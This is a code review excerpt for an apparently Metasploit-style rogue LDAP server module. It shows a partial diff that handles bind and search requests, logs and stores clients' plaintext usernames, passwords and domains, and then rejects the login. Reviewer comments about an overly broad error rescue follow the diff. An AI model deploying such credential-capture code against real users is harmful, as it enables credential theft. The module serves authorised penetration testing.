modules/auxiliary/server/capture/ldap.rb

```diff
@@ -0,0 +1,262 @@
+                    state[client][:domain] = pub_info[0]
+                  else
+                    result_code = Net::LDAP::ResultCodeInvalidCredentials
+                    print_error("LDAP Login Attempt => From:#{state[client][:name]} DN:#{user_login.name}")
+                  end
+                else
+                  state[client][:user] = user_login.name
+                  state[client][:domain] = nil
+                  result_code = Net::LDAP::ResultCodeInvalidCredentials
+                end
+              else
+                state[client][:user] = ''
+                state[client][:domain] = nil
+              end
+
+              state[client][:pass] = user_login.authentication
+
+              unless state[client][:user].empty? && state[client][:pass].empty?
+                report_cred(
+                  ip: state[client][:ip],
+                  port: client.localport,
+                  service_name: 'ldap',
+                  user: state[client][:user],
+                  password: state[client][:pass],
+                  domain: state[client][:domain]
+                )
+              end
+              print_good("LDAP Login Attempt => From:#{state[client][:name]} Username:#{state[client][:user]} Password:#{state[client][:pass]}")
+              result_code = Net::LDAP::ResultCodeAuthMethodNotSupported if result_code.nil?
+              service.encode_ldap_response(
+                pdu.message_id,
+                result_code,
+                '',
+                Net::LDAP::ResultStrings[result_code],
+                Net::LDAP::PDU::BindResult
+              )
+            when Net::LDAP::PDU::SearchRequest
+              filter = Net::LDAP::Filter.parse_ldap_filter(pdu.search_parameters[:filter])
+              attrs = pdu.search_parameters[:attributes].empty? ? :all : pdu.search_parameters[:attributes]
+              res = search_res(filter, pdu.message_id, attrs)
+              if res.nil? || res.empty?
+                result_code = Net::LDAP::ResultCodeNoSuchObject
+              else
+                client.write(res)
+                result_code = Net::LDAP::ResultCodeSuccess
+              end
+              service.encode_ldap_response(
+                pdu.message_id,
+                result_code,
+                '',
+                Net::LDAP::ResultStrings[result_code],
+                Net::LDAP::PDU::SearchResult
+              )
+            when Net::LDAP::PDU::UnbindRequest
+              client.close
+              nil
+            else
+              result_code = Net::LDAP::ResultCodeUnwillingToPerform
+              service.encode_ldap_response(
+                pdu.message_id,
+                result_code,
+                '',
+                Net::LDAP::ResultStrings[result_code],
+                Net::LDAP::PDU::SearchResult
+              )
+            end
+
+      on_send_response(client, res) unless res.nil?
+    rescue StandardError => e
```

Comment:
What are the actual error types that can be raised here?  This rescue looks a little too general.

Reply:
Looking further this rescue is not handling the result effectively.  This can end up sending a response that a `Net::LDAP::PDU::BindResult` is being denied, that does not match to the many possible `PDU` types this could be catching. Should this just `close` the connection, should this track the state of parsing and respond more carefully?